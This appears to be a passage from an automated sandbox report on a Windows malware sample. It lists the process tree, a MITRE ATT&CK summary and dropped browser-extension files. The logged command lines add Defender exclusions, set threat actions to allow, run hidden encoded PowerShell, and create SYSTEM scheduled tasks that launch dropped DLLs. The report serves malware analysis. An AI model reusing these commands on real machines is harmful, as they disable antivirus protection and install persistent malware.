C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32 3⤵ PID:2908
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64 3⤵ PID:3752
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32 3⤵ PID:2348
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64 3⤵
- System Location Discovery: System Language Discovery
PID:3404
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PeYlPniMlKWeAvybP /t REG_DWORD /d 0 /reg:32 3⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PeYlPniMlKWeAvybP /t REG_DWORD /d 0 /reg:64 3⤵ PID:3628
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\AkGJDxGRiCChDkCg /t REG_DWORD /d 0 /reg:32 3⤵ PID:3156
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\AkGJDxGRiCChDkCg /t REG_DWORD /d 0 /reg:64 3⤵
- System Location Discovery: System Language Discovery
PID:3552
-
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gcayjiTvn" /SC once /ST 06:07:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" 2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3504
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gcayjiTvn" 2⤵ PID:576
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gcayjiTvn" 2⤵ PID:4664
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "voUEtHYOOZwJsxqeG" /SC once /ST 05:13:07 /RU "SYSTEM" /TR "\"C:\Windows\Temp\AkGJDxGRiCChDkCg\scsXxWhnCmegqEO\fKyKrYk.exe\" 9m /tpRYdidkU 385104 /S" /V1 /F 2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3536
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "voUEtHYOOZwJsxqeG" 2⤵
- System Location Discovery: System Language Discovery
PID:3316
-
-
C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 680 2⤵
- Program crash
PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== 1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4752 -
C:\Windows\system32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force 2⤵ PID:3196
-
-
C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc 1⤵ PID:4980
-
C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum 1⤵ PID:2424
-
C:\Windows\system32\gpscript.exe gpscript.exe /RefreshSystemParam 1⤵ PID:4852
-
C:\Windows\Temp\AkGJDxGRiCChDkCg\scsXxWhnCmegqEO\fKyKrYk.exe C:\Windows\Temp\AkGJDxGRiCChDkCg\scsXxWhnCmegqEO\fKyKrYk.exe 9m /tpRYdidkU 385104 /S 1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3576 -
C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" 2⤵ PID:4424
-
C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" 3⤵
- Indirect Command Execution
PID:4800 -
C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 4⤵ PID:2728
-
\??\c:\windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 5⤵
- System Location Discovery: System Language Discovery
PID:3832
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" 3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2252 -
C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 4⤵
- System Location Discovery: System Language Discovery
PID:3320 -
\??\c:\windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 5⤵
- System Location Discovery: System Language Discovery
PID:4600
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" 3⤵
- Indirect Command Execution
PID:4972 -
C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 4⤵
- System Location Discovery: System Language Discovery
PID:4712 -
\??\c:\windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 5⤵ PID:1252
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" 3⤵
- Indirect Command Execution
PID:3588 -
C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 4⤵
- System Location Discovery: System Language Discovery
PID:3192 -
\??\c:\windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 5⤵ PID:2356
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" 3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1136 -
C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force 4⤵ PID:4520
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force 5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084 -
C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force 6⤵
- System Location Discovery: System Language Discovery
PID:128
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "bdLMAcyiuofwZlrejw" 2⤵ PID:4764
-
-
C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & 2⤵
- System Location Discovery: System Language Discovery
PID:3400 -
C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" 3⤵
- Indirect Command Execution
PID:1080 -
C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True 4⤵
- System Location Discovery: System Language Discovery
PID:2836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True 5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188 -
C:\Windows\SysWOW64\Wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True 6⤵ PID:1096
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZTBxIWbqU\dAwlTf.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yFAmEcnxfnVDyRq" /V1 /F 2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1412
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "yFAmEcnxfnVDyRq2" /F /xml "C:\Program Files (x86)\ZTBxIWbqU\VNLOHtB.xml" /RU "SYSTEM" 2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2272
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /END /TN "yFAmEcnxfnVDyRq" 2⤵ PID:2156
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "yFAmEcnxfnVDyRq" 2⤵ PID:1360
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "wCWAFWPNMRSlGi" /F /xml "C:\Program Files (x86)\OKRdpmURQpaU2\XVgdGQB.xml" /RU "SYSTEM" 2⤵
- Scheduled Task/Job: Scheduled Task
PID:2468
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "YfaQiAlrfROcW2" /F /xml "C:\ProgramData\VyxcWyOuWaibjkVB\agJvXBn.xml" /RU "SYSTEM" 2⤵
- Scheduled Task/Job: Scheduled Task
PID:1176
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "KPgtsQxhyWIiFNlMf2" /F /xml "C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\yMfLndn.xml" /RU "SYSTEM" 2⤵
- Scheduled Task/Job: Scheduled Task
PID:3464
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "VYhVIgyxLhHQmjZJVHg2" /F /xml "C:\Program Files (x86)\smKXxMfqpieUC\AxCSftX.xml" /RU "SYSTEM" 2⤵
- Scheduled Task/Job: Scheduled Task
PID:2116
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "RNbHXMWSUrQEjcGVS" /SC once /ST 06:31:23 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\AkGJDxGRiCChDkCg\fMUEmMrc\SEANApk.dll\",#1 /KGpdidMPTr 385104" /V1 /F 2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:440
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "RNbHXMWSUrQEjcGVS" 2⤵ PID:4608
-
-
C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "voUEtHYOOZwJsxqeG" 2⤵ PID:2324
-
-
C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2668 2⤵
- Program crash
PID:3076
-
-
C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 960 -ip 960 1⤵ PID:2364
-
C:\Windows\system32\rundll32.EXE C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\AkGJDxGRiCChDkCg\fMUEmMrc\SEANApk.dll",#1 /KGpdidMPTr 385104 1⤵ PID:2164
-
C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\AkGJDxGRiCChDkCg\fMUEmMrc\SEANApk.dll",#1 /KGpdidMPTr 385104 2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4224 -
C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "RNbHXMWSUrQEjcGVS" 3⤵
- System Location Discovery: System Language Discovery
PID:1380
-
-
-
C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4100 -ip 4100 1⤵ PID:2708
-
C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3576 -ip 3576 1⤵ PID:576
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe 1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3404
-
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe 1⤵
- Executes dropped EXE
PID:1672
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter: 1
  - PowerShell: 1
- Scheduled Task/Job: 1
  - Scheduled Task: 1
Privilege Escalation
- Abuse Elevation Control Mechanism: 1
  - Bypass User Account Control: 1
- Scheduled Task/Job: 1
  - Scheduled Task: 1
Defense Evasion
- Abuse Elevation Control Mechanism: 1
  - Bypass User Account Control: 1
- Impair Defenses: 3
  - Disable or Modify Tools: 3
- Indirect Command Execution: 1
- Modify Registry: 4
- Virtualization/Sandbox Evasion: 2
Credential Access
- Credentials from Password Stores: 1
  - Credentials from Web Browsers: 1
- Unsecured Credentials: 4
  - Credentials In Files: 4
Downloads
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize: 187B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize: 136B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize: 150B
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize: 151B
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize: 1KB
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 15KB
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 11KB
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 11KB
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 15KB